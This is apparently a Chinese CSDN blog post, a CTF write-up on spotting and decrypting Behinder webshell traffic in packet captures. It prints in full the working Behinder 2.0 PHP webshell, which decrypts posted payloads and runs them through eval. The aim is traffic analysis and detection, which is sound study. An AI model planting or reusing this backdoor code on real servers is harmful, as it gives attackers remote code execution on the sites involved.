Misc_冰蝎流量分析

最新推荐文章于 2024-06-01 16:21:45 发布
最新推荐文章于 2024-06-01 16:21:45 发布
阅读量3.1k 收藏 5
点赞数
分类专栏: Ctf_Misc 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/He0an39n/article/details/125520962
版权

01.冰蝎流量判断

在流量包中出现shell.php,多半是有关shell的题目,进行http分析可以看见 Behinder,可以知道是冰蝎流量

02.冰蝎shell分析

目前大部分的shell工具都是加密通信,因此知道加密方式与密钥十分关键

冰蝎采用的是AES加密,通信流程:

冰蝎2.0版本

冰蝎客户端发送Get请求服务器 => 服务器随机产生密钥后,插入在session返回给冰蝎客户端 => 冰蝎客户端通过密钥加密playload后,通过Post请求发送给服务器 => 服务器解密playload后执行,再将返回包加密后传送给冰蝎客户端

(通常AES加密前会进行一次Base64编码)

进行加密shell.php分析(在server目录下的shell.php)

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

在2.0版本中key是随机产生的

冰蝎3.0版本

3.0版本与2.0版本不同的地方在于3.0的key值是固定的,因此不再过多解释

03.冰蝎流量例题分析

通常我们可以在Get请求的返回包中寻找key值

 找到key后,观察Post请求。

通过key可以对发送和返回数据进行AES解密,后再通过Base64解密,来寻找到flag。

Hehanzzz!
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
冰蝎流量分析
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 439
每次Content-Length 较大,还都编码。每次Content-Length 较大,还都编码。
一道冰蝎文件流量分析的例题
09-01
一道冰蝎文件流量分析的例题
记一次解密wireshark抓取的冰蝎通信流量
m0_74131821的博客
04-21 1670
由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战
H&NCTF 2024 ez_pecp 冰蝎+CS流量分析
最新发布
qq_39947980的博客
06-01 369
4.x 版本 cs 的动态信标的进程转储文件是提取不出通信所需要的 key。AES加密的密钥为连接密码MD5的前16位,默认连接密码是。一个事实是 :冰蝎 shell 当中的恶意 php 脚本,考点:冰蝎webshell流量分析+CS4.x流量解密。可以导出http对象拿到 Secret.zip。等地址发起请求,而且下发指令的时候会请求。可以判断第一个流量包是CS流量。可以判断第二个才是正确的密码。现在拿到了 dmp.dmp了。两个数据base64解码后。有报错 直接问下GPT。可以成功解密流量内容。
记一次流量分析&代码分析-冰蝎
pingan233的博客
02-22 3405
冰蝎流程图如下:冰蝎是先请求服务端,服务端判断请求之后生成一个128位的随机数,并将这个128位的随机数写入到session里面,并将这个128位的随机数返回给客户端,但是客户端并不会使用这个key作为之后的通讯的key,而是会继续重复上面过程,不断获取key,直到满足特定条件之后,才会确定是最终的key。客户端会保存这个key和响应报文里面的set-cookie的值。这个key就是之后客户端和服务端进行通讯的密匙。检测请求方式:Request.method= GET。
冰蝎4.0特征分析及流量检测思路
A_991128a的博客
08-07 835
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Webshell工具的流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)
热门推荐
告白的博客
05-31 2万+
0x00 前言 使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 0x02 ......
2021-10-12T15_46_29.634969+00_00misc题_流量分析.rar
10-21
标题 "2021-10-12T15_46_29.634969+00_00misc题_流量分析.rar" 暗示这是一个关于网络安全竞赛(CTF)的挑战,涉及的是流量分析方面的内容。描述提到“CTF附件题——MISC类型——数据库登录”,表明该挑战可能需要...
2021-10-12T15_49_10.808949+00_00usb流量分析.zip
10-21
CTF附件题——usb流量分析 USB是 UniversalSerial Bus(通用串行总线)的缩写,是一个外部总线标准,用于规 范电脑与外部设备的连接和通讯,例如键盘、鼠标、打印机、磁盘或网络适配器等等。 通过对该接口流量的监听...
CTF哥斯拉冰蝎解码工具
02-23
承影_哥斯拉冰蝎解码工具1.1版本,助力CTF比赛
82.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)_杨秀璋的专栏-CSDN博客
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
syncOrderRelation.rar_misc_syncOrderRelation_webservice java dsm
09-19
【标题】"syncOrderRelation.rar_misc_syncOrderRelation_webservice java dsm" 提供的是一个关于移动misc平台订购处理的相关程序,结合了Web服务接口和Java技术,并涉及到DSM(可能是数据存储管理)方面。...
冰蝎流量分析
weixin_48776804的博客
05-27 2571
冰蝎流量分析
冰蝎v2.0.1流量分析
A_991128a的博客
08-08 624
冰蝎经过一系列的迭代,流量特征各有不同,我们以版本顺序探究冰蝎流量的进化史1、冰蝎自带webshell,我们以php的webshell为例(已加注释):[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YcUNPc4x-1691284675827)(https://image.3001.net/images/20220901/1662002545_631025711eac09769c395.png!small)]
分析冰蝎流量特征以及请求包
weixin_46299490的博客
09-17 1657
冰蝎流量特征
蚁剑、哥斯拉、菜刀、冰蝎(3.0/4.0)流量特征
qq_22792465的博客
07-25 2489
环境搭建:采用php一句话进行测试,可以用bp设置代理进行抓包查看,或使用wireshark进行过滤抓包逐步解析。
冰蝎3 冰蝎2 behinder流量分析 流量解密
ShenZ的博客
08-30 3208
好多没找全,明天再找吧 冰蝎3 AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。 webshell: php <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!exten
冰蝎各版本工具分析与魔改思路
QIANDXX的博客
02-08 1834
冰蝎各版本工具分析与魔改思路
冰蝎v4.0使用教程
10-25
冰蝎v4.0的使用教程涵盖了其主要功能,包括多视处理、斑点降噪、地理编码等,以及其强大的算法和技术原理。无论您是初学者还是专业人士,本教程都将帮助您掌握PolSARpro v4.0的各项工具和功能,提高您的图像处理能力。同时,冰蝎v4.0版本不再有连接密码的概念,而是提供了传输协议自定义功能,让用户对流量的加密和解密进行自定义,实现流量加解密协议的去中心化。因此,冰蝎v4.0的工作流程可以简述为:用户可以根据自己的需求自定义传输协议的算法,然后使用冰蝎v4.0进行流量加解密,实现去中心化的传输协议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hehanzzz!

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值